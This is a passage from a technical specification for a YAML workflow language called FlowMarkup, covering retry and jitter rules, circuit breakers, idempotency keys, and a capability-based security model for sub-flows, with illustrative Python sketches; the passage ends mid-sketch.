**Retry jitter:** `true` = 25%, `0.25` = 25%, `"25%"` = 25%. `EXPONENTIAL` defaults to `jitter: true`; other backoff modes default to `false`. The jitter formula is `actual_delay = calculated_delay × (1 + uniform_random(-jitter, +jitter))`, where `jitter` is the fractional value (e.g., 0.25 for 25%) and `uniform_random` produces a uniformly distributed value in the specified range. For example, with a 2s calculated delay and 25% jitter, the actual delay is uniformly distributed in [1.5s, 2.5s]. Jitter is not a security-sensitive random value, so engines need not use a cryptographically secure PRNG: `Math.random()` or an equivalent general-purpose PRNG is acceptable. For testing, engines MUST support a `retry.jitter.seed` configuration option that fixes the PRNG seed, producing deterministic jitter sequences for reproducible test scenarios.
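
The jitter formula can be sketched as below. The helper names are hypothetical. Passing a seeded `random.Random` instance plays the role that `retry.jitter.seed` plays in an engine.

```python
import random


def jitter_fraction(jitter):
    """Normalise true / false / number / "25%" to a fraction in [0.0, 1.0]."""
    if jitter is True:
        fraction = 0.25
    elif jitter is False or jitter is None:
        fraction = 0.0
    elif isinstance(jitter, str):
        if not jitter.endswith("%"):
            raise ValueError(f"unsupported jitter string: {jitter!r}")
        fraction = float(jitter[:-1]) / 100.0
    else:
        fraction = float(jitter)
    if not 0.0 <= fraction <= 1.0:
        raise ValueError(f"jitter out of range: {jitter!r}")
    return fraction


def jittered_delay(calculated_delay, jitter, rng):
    """actual_delay = calculated_delay * (1 + uniform_random(-jitter, +jitter))."""
    fraction = jitter_fraction(jitter)
    return calculated_delay * (1 + rng.uniform(-fraction, fraction))


# A fixed seed yields a reproducible sequence of delays for tests.
rng = random.Random(42)
delay = jittered_delay(2.0, "25%", rng)
assert 1.5 <= delay <= 2.5
```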

**Retry string shorthand:** `retry: "3/2s/EXPONENTIAL"` — grammar: `<maxAttempts>[/<delay>[/<backoff>]]`. Examples: `retry: 3`, `retry: "3/2s"`, `retry: "5/500ms/EXPONENTIAL"`, `retry: "3/1s/LINEAR"`. Advanced options (`onErrors`, `nonRetryable`, `maxDelay`, `jitter`) require object form. Follows the same precedent as `rateLimit: "100/1m"` / `"100/1m/GLOBAL"`.
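
A small parser for the shorthand grammar might look like the following. The function name is hypothetical, and the delay is kept as an unparsed duration string because the duration grammar is defined elsewhere in the specification.

```python
BACKOFFS = {"FIXED", "LINEAR", "EXPONENTIAL"}


def parse_retry_shorthand(value):
    """Expand `<maxAttempts>[/<delay>[/<backoff>]]` into object-form keys."""
    parts = str(value).split("/")
    if not 1 <= len(parts) <= 3 or not parts[0].isdigit():
        raise ValueError(f"invalid retry shorthand: {value!r}")
    parsed = {"maxAttempts": int(parts[0])}
    if len(parts) >= 2:
        if not parts[1]:
            raise ValueError(f"empty delay in retry shorthand: {value!r}")
        parsed["delay"] = parts[1]  # duration string, left unparsed here
    if len(parts) == 3:
        if parts[2] not in BACKOFFS:
            raise ValueError(f"unknown backoff: {parts[2]!r}")
        parsed["backoff"] = parts[2]
    return parsed


assert parse_retry_shorthand("5/500ms/EXPONENTIAL") == {
    "maxAttempts": 5,
    "delay": "500ms",
    "backoff": "EXPONENTIAL",
}
```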

**`async: true`** -- fire-and-forget. Errors logged but not propagated to the parent flow's `catch:` handlers — the parent flow continues unaware. Security errors (`MissingCapabilityError`, `SecretAccessError`, `AuthenticationError`, `AccessDeniedError`) are NOT propagated either, but are escalated to the audit log unconditionally ([FLOWMARKUP-ENGINE.md](FLOWMARKUP-ENGINE.md) §5.7). SA-RUN-18 (WARN) flags `async: true` on steps that invoke sub-flows with security-sensitive capabilities (`SECRET`, `EXEC`, `MAIL`, `REQUEST`, `STORAGE`, or `SSH`) — security violations in fire-and-forget steps are invisible to the caller. SA-RUN-20 (WARN) flags `async: true` sub-flows that write to `GLOBAL.*` keys also written by the parent or sibling async sub-flows — concurrent writes have no ordering guarantee (last writer wins).

**Retryable vs non-retryable errors:**

| Category | Error types | Retry? |
|---|---|---|
| Transient infrastructure | `TimeoutError`, `ConnectionError`, `TLSError` | Yes |
| Rate limiting | `RateLimitError` | Yes |
| Event buffer full | `EventBufferFullError` | Yes |
| Transient service | `ServiceUnavailableError`, `ServiceError` | Yes |
| HTTP server error | `HttpError` (5xx status) | Yes |
| HTTP client error | `HttpError` (4xx status) | No |
| Optimistic conflict | `ConflictError` | No (see note) |
| Bad input | `ValidationError`, `BadRequestError` | No |
| Authentication | `AuthenticationError` | No |
| Access denied | `AccessDeniedError` | No |
| Missing capability | `MissingCapabilityError` | No |
| Not found | `NotFoundError` | No |
| Configuration | `ConfigurationError` | No |
| Assertion | `AssertionError` | No |
| Business logic | application-specific | No |
| Rollback result | `RolledBackError`, `RollbackFailedError` | No |
| Circuit open | `CircuitOpenError` | No |
| Recursion overflow | `StackOverflowError` | No |
| Group failure | `GroupError` | No |

> **`HttpError` retryability:** Whether an `HttpError` is retryable depends on its HTTP status code. 5xx (server errors) are transient and retryable. 4xx (client errors) indicate bad input and are non-retryable. The retry middleware MUST inspect `ERROR.DATA.status` to determine retryability.
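
The default classification in the table above, including the status-code check for `HttpError`, could be sketched like this. The function name and the plain-dictionary stand-in for `ERROR.DATA` are assumptions. Step-level `onErrors` and `nonRetryable` overrides are deliberately left out.

```python
# Error types the table marks as retryable by default.
RETRYABLE_BY_DEFAULT = {
    "TimeoutError",
    "ConnectionError",
    "TLSError",
    "RateLimitError",
    "EventBufferFullError",
    "ServiceUnavailableError",
    "ServiceError",
}


def is_retryable(error_type, error_data=None):
    """Return the default retry decision for an error type."""
    if error_type == "HttpError":
        # Only 5xx responses are transient; 4xx and missing status are not retried.
        status = (error_data or {}).get("status")
        return isinstance(status, int) and 500 <= status <= 599
    return error_type in RETRYABLE_BY_DEFAULT
```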

> **`ConflictError` note:** `ConflictError` from optimistic locking is non-retryable by default because the flow author must decide whether to re-read state before retrying. Automatic retry without re-reading the resource would repeat the same conflict. To implement OCC retry, use `catch: { ConflictError: [...] }` with explicit re-read and retry logic.

**`GroupError`** -- raised by `group` with `failPolicy: COMPLETE` when one or more branches fail. Properties: `ERROR.DATA.failures` (list of per-branch error summaries, each with `branch`, `type`, `message`), `ERROR.DATA.succeeded` (list of branch names that completed successfully).

### 4.2 Rate Limiting

**String shorthand:** `rateLimit: 100/1m` or `rateLimit: 100/1m/GLOBAL`. The optional third segment specifies scope (LOCAL, CONTEXT, GLOBAL). Advanced fields (`strategy`, `key`, `timeout`) still require object form.

**Object form:** `invocations`, `per`, `strategy` (WAIT|REJECT), `scope`, `key`, `timeout`.

Scope defaults: flow-level -> GLOBAL, action-level -> LOCAL. Rate limit scope is determined by the flow definition and MUST NOT be downgraded by capability restrictions. If the flow declares `rateLimit: { scope: GLOBAL }`, all instances share the global counter regardless of `cap:` restrictions.

### 4.3 Circuit Breaking

**State machine:** CLOSED -> (threshold reached) -> OPEN -> (resetTimeout expires) -> HALF_OPEN -> (trials succeed) -> CLOSED.

**OPEN:** Rejects with `CircuitOpenError`. No execution, no rateLimit token consumed, no retry, no rollback registration.

**`CircuitOpenError`** -- non-retryable. Properties: `ERROR.DATA.name`, `ERROR.DATA.scope`, `ERROR.DATA.failures`, `ERROR.DATA.opened_at`, `ERROR.DATA.reset_at`.

`ConflictError` and `DeadlockError` are always excluded from failure counting.
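
The state machine can be sketched as a small class. Everything here is illustrative: the class and method names are hypothetical, time is passed in as epoch seconds, and reopening the circuit on a failed HALF_OPEN trial is an assumption, since the text above only describes the success path out of HALF_OPEN.

```python
class CircuitOpenError(Exception):
    """Stand-in for the engine's CircuitOpenError."""


# Error types that never count towards the failure threshold.
EXCLUDED_FROM_COUNTING = {"ConflictError", "DeadlockError"}


class CircuitBreaker:
    def __init__(self, threshold, window=60.0, reset_timeout=30.0, half_open_attempts=3):
        self.threshold = threshold
        self.window = window
        self.reset_timeout = reset_timeout
        self.half_open_attempts = half_open_attempts
        self.state = "CLOSED"
        self.failure_times = []
        self.opened_at = None
        self.trial_successes = 0

    def before_call(self, now):
        """Reject while OPEN; move to HALF_OPEN once resetTimeout has expired."""
        if self.state == "OPEN":
            if now - self.opened_at < self.reset_timeout:
                raise CircuitOpenError()
            self.state = "HALF_OPEN"
            self.trial_successes = 0

    def record_success(self):
        if self.state == "HALF_OPEN":
            self.trial_successes += 1
            if self.trial_successes >= self.half_open_attempts:
                self.state = "CLOSED"
                self.failure_times = []

    def record_failure(self, error_type, now):
        if error_type in EXCLUDED_FROM_COUNTING:
            return
        if self.state == "HALF_OPEN":
            self._open(now)  # assumption: a failed trial reopens the circuit
            return
        recent = [t for t in self.failure_times if now - t < self.window]
        self.failure_times = recent + [now]
        if len(self.failure_times) >= self.threshold:
            self._open(now)

    def _open(self, now):
        self.state = "OPEN"
        self.opened_at = now
```

Because `before_call` raises before anything else happens, an OPEN circuit consumes no rate-limit token and triggers no retry, matching the execution order `circuitBreaker -> rateLimit -> retry -> timeout`.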

Scope defaults: flow-level -> GLOBAL, action-level -> LOCAL.

Static analysis: SA-CB rules apply.

**Circuit breaker string shorthand:** `circuitBreaker: "5/payment_api"` — grammar: `<threshold>/<name>`. Examples: `circuitBreaker: "5/payment_api"`, `circuitBreaker: "10/inventory"`. The name must be a static literal (no `=` prefix); `/` is not allowed in the name segment. Advanced options (`window`, `resetTimeout`, `halfOpenAttempts`, `scope`, `errors`, `nonCountable`) require object form. Follows the same precedent as `retry: "3/2s/EXPONENTIAL"` and `rateLimit: "100/1m"` — primary numeric value first.

**Circuit breaker integer shorthand:** `circuitBreaker: 5` — bare integer treated as threshold. The circuit breaker name is auto-derived from the step's `_id_`. SA-CB-13 (ERROR) rejects integer shorthand on steps without `_id_`. All other fields use defaults (`window: 1m`, `resetTimeout: 30s`, `halfOpenAttempts: 3`).

**Circuit breaker shorthand in `defaults:`:** Neither integer nor string shorthand is valid in `defaults.circuitBreaker`. Integer form has no step context for `_id_` derivation; string shorthand would assign a single name to all descendant steps, causing unintended sharing (see SA-DEF-1). SA-DEF-5 (ERROR) rejects shorthand forms in defaults. Use object form or a CEL reference (`=MY_BREAKER` from `const:`) in defaults.

**Circuit breaker registry limits:** The engine MUST enforce the same per-tenant registry limit (default: 10,000) and per-flow limit (default: 100) for circuit breaker names as for lock names. Dynamic circuit breaker names from CEL expressions risk unbounded registry growth — SA-CB-12 (WARN) warns on dynamic circuit breaker names.

### 4.4 Idempotency Key

```yaml
idempotencyKey: "='payment:' + order_id + ':' + amount"
```

The key is evaluated at invocation time, before `vars:`/`const:`, so only `ENV.*`, `SECRET.*`, `GLOBAL.*`, `CONTEXT.*`, and flow `input` are in scope. A duplicate key raises `DuplicateInvocationError` (non-retryable).

Idempotency keys MUST be deterministic. Using non-deterministic functions (`uuid()`, `random()`, `now()`) defeats deduplication entirely: each retry generates a new key, causing duplicate side effects. SA-IDEMP-1 (ERROR) rejects non-deterministic idempotency key expressions.

- Correct: `idempotencyKey: =input.order_id + "-" + input.item_id`
- Wrong: `idempotencyKey: =uuid()`

**Idempotency semantics:** The engine MUST implement idempotency key checks using atomic compare-and-set (CAS) against a durable store. The check MUST complete before any action execution begins — `DuplicateInvocationError` MUST be raised before side effects. The engine MUST enforce a configurable dedup window (default: 24 hours, minimum: 1 minute, maximum: 30 days). Keys older than the window are eligible for eviction. The engine SHOULD provide a management API to inspect and clear idempotency keys.
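
The check-before-execute rule might be sketched as below. The class name is hypothetical, and an in-process dictionary guarded by a lock stands in for the durable store and its atomic compare-and-set, which a real engine would need to provide across processes.

```python
import threading


class DuplicateInvocationError(Exception):
    """Stand-in for the engine's DuplicateInvocationError."""


class IdempotencyStore:
    MIN_WINDOW = 60                 # 1 minute
    MAX_WINDOW = 30 * 24 * 3600     # 30 days

    def __init__(self, window_seconds=24 * 3600):
        if not self.MIN_WINDOW <= window_seconds <= self.MAX_WINDOW:
            raise ValueError("dedup window out of range")
        self.window = window_seconds
        self._lock = threading.Lock()
        self._claimed = {}  # key -> time of first claim

    def claim(self, key, now):
        """Atomically claim a key; raise if it was claimed within the window."""
        with self._lock:
            first_seen = self._claimed.get(key)
            if first_seen is not None and now - first_seen < self.window:
                raise DuplicateInvocationError(key)
            # Either a new key or one old enough to be eligible for eviction.
            self._claimed[key] = now
```

The engine would call `claim` before starting the action, so a duplicate is rejected before any side effect occurs.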

### 4.5 Step I/O -- params and result

**`params:`** -- Three forms:

1. **Object:** `params: { key: =expr, other: literal }`. Keys are parameter names; values are CEL expressions, literals, or null. A null value uses the same-name convention: `key:` (null) passes the local variable `=key`.
2. **List:** `params: [a, b, c]`. Each name passes the local variable with the same name. Equivalent to `{a: =a, b: =b, c: =c}`.
3. **Mixed:** object form with null-value and explicit-value keys together.

Only on `call`/`run`.
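
The equivalence between the three forms can be shown with a small normaliser. This is a sketch with a hypothetical function name, operating on `params:` values as they would appear after YAML parsing (a list, or a dictionary whose null values are `None`).

```python
def normalize_params(params):
    """Expand list form and null-value shorthand into explicit `=name` references."""
    if isinstance(params, list):
        return {name: "=" + name for name in params}
    return {
        key: ("=" + key if value is None else value)
        for key, value in params.items()
    }


# List form and null-value form expand to the same explicit mapping.
assert normalize_params(["a", "b"]) == {"a": "=a", "b": "=b"}
assert normalize_params({"a": None, "b": None}) == {"a": "=a", "b": "=b"}
```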

Static analysis rule SA-PARAM-5 (WARN) MUST flag null-value shorthand (`params: { key: }`) when the matching local variable has not been explicitly assigned in the current scope.

**`result:`** -- object form (target: =source) or string form (single variable name). Object-form values MUST start with `=`. `$yields:` captures materialized yield list.

**List form edge case:** In `result: [key1, key2]`, if a listed key is not present in `RESULT`, the variable is set to `null`. SA-RESULT-4 (WARN) flags list-form keys not in the action's declared output.

Action providers MAY declare `sensitive: true` on output fields that contain credential material. When `sensitive: true` is declared, the engine automatically applies `$exportable: false` to the receiving flow variable. Flow authors who need `$secret: true` opacity MUST add that annotation explicitly.

Example:
```yaml
output:
  params:
    access_token:
      type: STRING
      sensitive: true
    refresh_token:
      type: STRING
      sensitive: true
    expires_in:
      type: INTEGER
```

### 4.6 Default Actions

#### `call` -- Service Invocation

Invokes a named service operation. `service:` and `operation:` are REQUIRED.

**`service:`** -- bare alias (`service: db` -> `SERVICES.db`) or CEL expression (`service: =SERVICES.db`).

**`operation:`** -- bare name or CEL expression. Must match `^[a-zA-Z_][a-zA-Z0-9_]*$`.

```yaml
- call:
    service: db
    operation: query
    params:
      sql: 'SELECT * FROM users WHERE email = ?'
      params: [=user_email]
    result: { user_list: =RESULT.rows }
```

**Standard DB operations:** `query`, `execute`, `scalar`, `batch`.

**Inline service calls in CEL:** `SERVICES.<alias>.<operation>(<params-map>)`. No retry, circuit breaker, or streaming. Use for simple lookups and conditions. SA-SVC-9, SA-SVC-10 apply. Inline CEL service calls MUST have an engine-configurable default timeout (default: 5 seconds, configurable maximum: 30 seconds). Calls exceeding the timeout MUST raise `TimeoutError`. Inline CEL service calls MUST be subject to the flow-level or step-level rate limit when configured. SA-SVC-11 (WARN) flags inline CEL service calls inside loop bodies (`forEach`, `while`, `repeat`) — use an explicit `call` action step for resilient service invocation.

**Query safety:** Service providers that accept SQL or query parameters SHOULD enforce parameterized queries. The engine does not validate service-specific query languages.

#### `run` -- Sub-flow Invocation

```yaml
- run:
    flow: "validation/check-content.flowmarkup.yaml"
    params: { text: =claude_result }
    result: { is_valid: =RESULT.is_valid }
```

**Path resolution:** Relative paths are resolved from the calling flow's directory. Absolute paths (starting with `/`) and URLs are used as-is.

**`flow: CURRENT`** -- self-invocation for recursion. The flow's own `requires:` applies; effective capabilities equal the caller's capabilities. `condition:` guard REQUIRED to avoid infinite loops (SA-RUN-9). The engine MUST enforce a maximum recursion depth (default: 100). Exceeding this limit raises `StackOverflowError` (non-retryable).

**`integrity:`** -- SRI-style hash (`sha256-<base64>`, `sha384-<base64>`, `sha512-<base64>`).
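
Computing and checking an SRI-style value of this shape might look as follows. The function names are hypothetical. The sketch assumes the hash is taken over the raw bytes of the fetched flow file, which this section does not spell out.

```python
import base64
import hashlib
import hmac

ALGORITHMS = {
    "sha256": hashlib.sha256,
    "sha384": hashlib.sha384,
    "sha512": hashlib.sha512,
}


def integrity_value(content, algorithm="sha256"):
    """Return `<algorithm>-<base64 digest>` for the given bytes."""
    digest = ALGORITHMS[algorithm](content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def verify_integrity(content, expected):
    """Check fetched bytes against a declared integrity value."""
    algorithm, separator, _ = expected.partition("-")
    if not separator or algorithm not in ALGORITHMS:
        return False
    return hmac.compare_digest(integrity_value(content, algorithm), expected)
```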

##### Capability Security Model

Every flow MUST declare `requires:`. There is no implicit capability inheritance, no same-origin vs cross-origin distinction, and no `capDrop:` blocklist.

**Capability resolution rule (single rule):**

```
effective = requires(sub-flow) ∩ capabilities(caller) ∩ cap(run-step, if present)
```

The sub-flow receives the intersection of:
1. What it declares in `requires:` (what it needs)
2. What the caller has (monotonic decrease)
3. Any further restrictions from `cap:` on the `run:` step

If the sub-flow's `requires:` includes a capability the caller does not have, the engine raises `MissingCapabilityError` at load time (SA-RUN-5).
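
The resolution rule can be sketched with plain sets. This is a deliberately simplified model: each category is a set of exact names, pattern matching and `INHERIT` are ignored, and the function name is hypothetical.

```python
class MissingCapabilityError(Exception):
    """Stand-in for the engine's MissingCapabilityError."""


def effective_capabilities(requires, caller, cap=None):
    """effective = requires(sub-flow) ∩ capabilities(caller) ∩ cap(run-step, if present)."""
    effective = {}
    for category, needed in requires.items():
        granted = caller.get(category, set())
        missing = needed - granted
        if missing:
            # The sub-flow asks for something the caller does not hold.
            raise MissingCapabilityError(f"{category}: {sorted(missing)}")
        allowed = needed & granted
        if cap is not None:
            # Categories not stated in the object form of cap: default to NONE.
            allowed = allowed & cap.get(category, set())
        effective[category] = allowed
    return effective
```

Because the result is always an intersection with the caller's grant, a sub-flow can never end up with more than its caller holds.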

**`cap:` on `run:` steps:** Object form provides per-category restrictions — unstated categories default to NONE. `cap: INHERIT` is an explicit opt-in to pass all caller capabilities through (sub-flow still bounded by its own `requires:`). Equivalent to omitting `cap:` but documents intent.

**Per-category `INHERIT`:** `cap: { <CATEGORY>: INHERIT }` on `run:` steps forwards the caller's entire grant for that category to the sub-flow. This distinguishes two concepts: **access rights** (what the sub-flow can use, computed as `requires ∩ given`) vs **forwarding rights** (`INHERIT` = the caller's entire granted set for that category is forwarded, not just what the sub-flow declares in `requires:`). Applies to all non-boolean categories: `SECRET`, `EXEC`, `REQUEST`, `MAIL`, `ENV`, `CONTEXT`, `GLOBAL`, `RESOURCES`, `STORAGE`, `SSH`. `requires: { SECRET: INHERIT }` is NOT valid — flows MUST enumerate the specific secrets they access. `INHERIT` is only valid on `cap:` (the forwarding side), never on `requires:` (the declaration side).

**Security advisory:** `cap: { EXEC: INHERIT }` and `cap: { SSH: INHERIT }` forward shell access to the sub-flow. Unless the sub-flow is verified with `integrity:`, prefer explicit capability enumeration:
```yaml
cap:
  EXEC: [specific-command-1, specific-command-2]
  SSH: [{host: specific-host, commands: [specific-cmd]}]
```
SA-CAP-4 (ERROR) rejects `EXEC`/`SSH` `INHERIT` on `run:` steps without `integrity:` verification.

**`cap: INHERIT` audit requirement.** *(CWE-250: Execution with Unnecessary Privileges)*

- **Full pass-through (`cap: INHERIT`).** `cap: INHERIT` on `run:` steps MUST be rejected at static analysis time with ERROR severity (SA-CAP-3). In relaxed security mode, engines MAY downgrade to WARN with explicit operator opt-in. When a `run` step uses `cap: INHERIT`, the engine MUST log an audit event at WARNING level indicating that the sub-flow receives the caller's full capability set, and static analysis rule SA-RUN-18 (severity WARN) MUST flag the use and recommend explicit capability restriction. Any `run:` step using `cap: INHERIT` MUST include `integrity:` for remote flows.
- **Per-category grants (`cap: { <CATEGORY>: INHERIT }`).** Each use MUST generate an audit log entry. Static analysis MUST emit SA-CAP-5 (WARN) for every per-category `INHERIT` grant (e.g., `cap: { SECRET: INHERIT }`, `cap: { EXEC: INHERIT }`) individually, as each category carries distinct risk.
- Flows using `INHERIT` SHOULD document the security rationale in a comment.

**`flow: CURRENT`** — self-recursion still works. The flow's own `requires:` applies. Effective capabilities = caller's capabilities (since `requires` is the same flow).

**Capability categories:**

| Category | Granularity | Default |
|---|---|---|
| `ENV` | Per-variable array | Deny |
| `CONTEXT` | Per-key array, or `{read: [...], write: [...]}` | Deny |
| `GLOBAL` | Per-key array, or `{read: [...], write: [...]}` | Deny |
| `SERVICES` | Per-service array, typed object, or remapping object | Deny |
| `SUBFLOWS` | Boolean | Deny |
| `REQUEST` | Per-origin pattern array | Deny |
| `EXEC` | Per-executable array | Deny |
| `MAIL` | Boolean or per-recipient array | Deny |
| `RUNTIME` | Boolean | Deny |
| `SECRET` | Per-secret array | Deny |
| `RESOURCES` | Named array or typed object | Deny |
| `STORAGE` | Per-alias or per-URL-pattern, per-operation, optional per-path | Deny |
| `SSH` | Per-alias or per-host with per-command allowlist (map-only) | Deny |

Example: `cap: { SECRET: ["api_token", "db_credentials"], EXEC: ["python3"], ENV: ["API_KEY"] }`

**`STORAGE` capability:** Keys are **aliases** (engine-provisioned or parent-flow-provisioned names matching `^[a-z][a-z0-9_]*$`) or **URL patterns** (starting with a known scheme: `s3://`, `sftp://`, `smb://`, `ftp://`, `file://`). Three forms with progressive granularity:

```yaml
requires:
  # Each STORAGE entry below is an alternative; a flow declares a single STORAGE key.
  # Form 1: Array of aliases or URL patterns (full access to all operations)
  STORAGE: [data, backup]                                  # aliases
  STORAGE: ["s3://my-bucket/*", "sftp://backup.host/*"]    # URL patterns
  STORAGE: [data, "s3://other-bucket/*"]                   # mixed

  # Form 2: Per-key with operation restrictions
  STORAGE:
    data: [get, put, list]                                 # alias + ops
    "s3://my-bucket/public/*": [get, list]                 # URL pattern + ops
    "sftp://backup.host/backups/*": [put, mkdir]           # URL pattern + ops

  # Form 3: Per-alias with operations + path prefixes (alias keys only)
  STORAGE:
    data:
      operations: [get, list, info, exists]
      paths: ["public/*", "reports/*"]                     # path-prefix patterns
    backup:
      operations: [put]
      paths: ["/uploads/*"]
```

Key resolution: if a key starts with a known scheme (`s3://`, `sftp://`, `smb://`, `ftp://`, `file://`) it is a **URL pattern** — scheme+authority match exactly, `*` suffix matches any path prefix. Otherwise it is a **bare alias** (must match `^[a-z][a-z0-9_]*$`). Path prefix in URL patterns subsumes the `paths:` restriction — for alias keys, the `{operations, paths}` object form is retained. Path prefix matching: `"public/*"` matches any path starting with `public/`. Paths without `*` match exactly. `transfer` requires both source and target URLs/aliases in `STORAGE` — source with `get` (or full access), target with `put` (or full access).
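
The key-resolution and path-prefix rules can be sketched as two small helpers. The function names are hypothetical, and only the rules stated above are covered: scheme detection, the alias pattern, `*` suffix as prefix match, and exact match otherwise.

```python
import re

KNOWN_SCHEMES = ("s3://", "sftp://", "smb://", "ftp://", "file://")
ALIAS_PATTERN = re.compile(r"^[a-z][a-z0-9_]*$")


def classify_storage_key(key):
    """Return "url_pattern" or "alias" for a STORAGE capability key."""
    if key.startswith(KNOWN_SCHEMES):
        return "url_pattern"
    if ALIAS_PATTERN.fullmatch(key):
        return "alias"
    raise ValueError(f"not a valid alias or URL pattern: {key!r}")


def path_matches(pattern, path):
    """A trailing `*` matches any path with that prefix; otherwise match exactly."""
    if pattern.endswith("*"):
        return path.startswith(pattern[:-1])
    return path == pattern


assert classify_storage_key("s3://my-bucket/*") == "url_pattern"
assert path_matches("public/*", "public/reports/q1.csv")
```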

**`cap.STORAGE`** on `run:` steps — supports alias provisioning, forwarding, and restriction:

```yaml
- run:
    flow: "etl/process.flowmarkup.yaml"
    cap:
      # Each STORAGE entry below is an alternative; use a single STORAGE key per step.
      # Full forward
      STORAGE: INHERIT

      # Provision aliases for the sub-flow
      STORAGE:
        data: "s3://prod-bucket"           # provision alias → literal URL
        backup: =SFTP_URL                  # provision alias → CEL-resolved URL
        archive: archive                   # forward engine alias as-is

      # Restrict by URL pattern
      STORAGE:
        "s3://prod-bucket/public/*": [get, list]

      # Mixed aliases + URL patterns
      STORAGE:
        data: [get, list]                  # forward alias, restrict ops
        "sftp://backup.host/*": [put]      # URL pattern + ops
```

Effective capability: `effective = requires(sub-flow) ∩ cap(run-step) ∩ capabilities(caller)` — same intersection rule as all other categories.

**`SSH` capability:** Keys are **aliases** (matching `^[a-z][a-z0-9_]*$`) or **hostnames** (containing `.` or `:`). Map-only form — a command allowlist is always required. There is no array-only form (unlike `EXEC` or `STORAGE`):

```yaml
requires:
  SSH:
    prod_server: [rsync, df, deploy.sh]        # alias
    "staging.example.com": [deploy.sh]          # hostname
```

The engine validates `ssh.command` against the per-alias or per-host allowlist (SA-SSH-2). SA-SSH-3 (ERROR) rejects interpreter names in the allowlist.

**`cap.SSH`** on `run:` steps — supports alias provisioning, forwarding, and restriction:

```yaml
- run:
    flow: "deploy/release.flowmarkup.yaml"
    cap:
      # Each SSH entry below is an alternative; use a single SSH key per step.
      # Full forward
      SSH: INHERIT

      # Or provision/remap
      SSH:
        prod: "prod.example.com"               # provision alias → hostname
        staging: staging                        # forward engine alias

      # Or restrict
      SSH:
        prod: [deploy.sh]                      # forward alias, restrict commands
```

**MAIL recipient restrictions:** `MAIL: ["@example.com"]` allows sending to any address at `example.com`. `MAIL: ["admin@external.org"]` allows one exact address. `MAIL: ["@example.com", "admin@external.org"]` allows both. `@domain.com` matches the exact domain only (no subdomains, case-insensitive). The engine MUST validate all `to:`/`cc:`/`bcc:` addresses against the allowlist before sending and raise `MissingCapabilityError` on violation.
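
The allowlist check might be sketched as below. The function name is hypothetical. Domain entries are compared case-insensitively as stated above, while comparing exact-address entries literally is an assumption of the sketch, since the text does not specify case handling for them.

```python
def recipient_allowed(address, allowlist):
    """Return True if the address matches an `@domain` or exact-address entry."""
    local, separator, domain = address.rpartition("@")
    if not separator or not local or not domain:
        return False  # not of the form local@domain
    for entry in allowlist:
        if entry.startswith("@"):
            # Exact domain only: subdomains do not match.
            if domain.lower() == entry[1:].lower():
                return True
        elif address == entry:
            return True
    return False


allowlist = ["@example.com", "admin@external.org"]
assert recipient_allowed("bob@example.com", allowlist)
assert not recipient_allowed("bob@mail.example.com", allowlist)
```

An engine would run this check over every `to:`, `cc:`, and `bcc:` address and refuse to send if any address fails.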

##### FlowHandle and Event Source Enforcement

**`handle:` on `run:` steps** creates a local read-only binding of type `FlowHandle`:

```yaml
- run:
    flow: "payment-processor.flowmarkup.yaml"
    handle: payment_proc
    async: true
    params: { order_id: =order_id }
```

- `handle:` follows variable naming rules (snake_case)
- Read-only — cannot be overwritten by `set:`
- Cannot be logged, returned, emitted, or yielded (non-exportable by design)
- Available on both sync and async `run:` steps (most useful with `async: true`)

**FlowHandle properties (CEL, read-only):**

| Property | Type | Description |
|---|---|---|
| `handle.status` | string | `RUNNING`, `COMPLETED`, `FAILED`, `CANCELLED` |
| `handle.flow` | string | Canonical flow location (FlowRef path) |
| `handle.instance_id` | string | Unique instance identifier (globally unique within the engine deployment, stable across checkpoint resume, printable ASCII, max 128 bytes; UUID v4 RECOMMENDED, format is engine-specific) |

Status is read-only and has no side effects — safe in any CEL context.

**Auto-stringify:** FlowHandle auto-stringifies to its canonical flow location (`handle.flow`). This enables direct use in string contexts: `log: "Running: " + payment_proc` produces `"Running: payment-processor.flowmarkup.yaml"`.

**`source:` on `waitFor:`** — engine-level source filter:

```yaml
- waitFor:
    event: payment_completed
    source: =payment_proc
    timeout: 5m
    capture: [tx_id]
```

- Engine only delivers events from the matching source instance (and its transitive sub-flow descendants)
- Pre-delivery filtering — the event never reaches the flow if source doesn't match
- `source:` evaluates to a `FlowHandle` (instance-level) or `string` (flow-path filter matching `EVENT.SOURCE`)
- When omitted, all events of the matching type are delivered; for `scope: GLOBAL` listeners, SA-EVENT-11 rejects this as an ERROR

**`EVENT.SOURCE` identity:** `EVENT.SOURCE` is engine-stamped — it cannot be overridden by the emitting flow. It evaluates to the canonical flow location string (`flow_id`) extracted from the verified source structure (see GLOBAL event signature format above). For GLOBAL events, the engine verifies the full cryptographic envelope before exposing the flow identity as `EVENT.SOURCE`. For instance-level filtering (specific running instance), use a FlowHandle: `source: =handle`. For flow-identity filtering (any instance of a specific flow), use a string: `source: "path/to/flow.flowmarkup.yaml"`.

Static analysis: SA-HANDLE-1 (WARN) when handle is declared but never used. SA-HANDLE-2 (ERROR) when handle name conflicts with vars/const/forEach.as. SA-HANDLE-3 (ERROR) when FlowHandle used at output boundary. SA-EVENT-11 (ERROR) when `waitFor:` with `scope: GLOBAL` and no `source:` filter.

**Full RACE orchestration example** — async sub-flow with source-verified event wait and timeout guard:

```yaml
- run:
    flow: "payment-processor.flowmarkup.yaml"
    handle: payment_proc
    async: true
    params: { order_id: =order_id }

# Wait for payment result with source verification
- race:
    wait_result:
      - waitFor:
          event: payment_completed
          source: =payment_proc
          timeout: 5m
          capture: [tx_id]
    timeout_guard:
      - wait: 4m
      - cancel: =payment_proc
      - throw: { error: PaymentTimeoutError, message: "Payment timed out" }
```

##### Git Ref Pinning (`?ref=`)

Append `?ref=VALUE` to git-backed URLs. A value of 7-40 hexadecimal characters is treated as a commit SHA (immutable). Mutable refs SHOULD pair with `integrity:` (SA-RUN-11). `?ref=` is excluded from origin computation.

| Scheme | `//` required | Origin prefix |
|---|---|---|
| `github://` | Optional | `github://owner/repo/` |
| `gitlab://` | Required | `gitlab://group/.../project/` |
| `bitbucket://` | Optional | `bitbucket://workspace/repo/` |
| HTTPS `.git//` | Required | `https://host/repo.git/` |

**Credential resolution:** Credentials are engine-managed and MUST NOT appear in flow YAML. A resolution failure raises `FlowFetchError`.
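As a non-normative illustration of the `?ref=` rule above, the following Python sketch extracts the ref from a flow URL and classifies it as immutable or mutable. The function names and the example URL are hypothetical, and accepting uppercase hex digits is an assumption of this sketch.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# 7-40 hex characters are treated as an immutable commit SHA.
# Accepting uppercase hex is an assumption of this sketch.
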